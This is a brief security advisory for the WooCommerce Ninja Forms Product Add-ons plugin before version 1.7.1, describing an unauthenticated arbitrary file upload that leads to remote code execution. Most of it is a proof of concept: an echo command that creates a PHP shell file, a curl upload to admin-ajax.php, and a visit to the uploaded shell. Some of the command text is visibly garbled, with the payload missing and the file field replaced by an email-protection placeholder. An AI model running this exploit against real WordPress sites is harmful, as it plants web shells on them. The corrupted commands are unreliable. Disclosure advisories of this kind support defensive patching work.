WooCommerce Ninja Forms Product Add-ons < 1.7.1 - Unauthenticated Arbitrary File Upload

Description The plugin does not validate the file to be uploaded, allowing any unauthenticated users to upload arbitrary files to the server, leading to RCE.

PoC

Make sure to have both WooCommerce and NinjaForms 3.4.34.2 (NF’s latest version on the 3.4 branch) installed, then follow those instructions: 1 - Run the following shell command to create a PHP file who’s mime type will be detected as text/plain: echo 'Hello world! shell.php 2 - Run the following curl command to upload the malicious PHP file onto the site: curl ‘https://example.com/wp-admin/admin-ajax.php’ -F ‘action=wc_nf_submit’ -F ‘f[][email protected]’ 3 - Visit the uploaded shell at 'https://example.com/wp-content/uploads/YYYY/MM/shell.php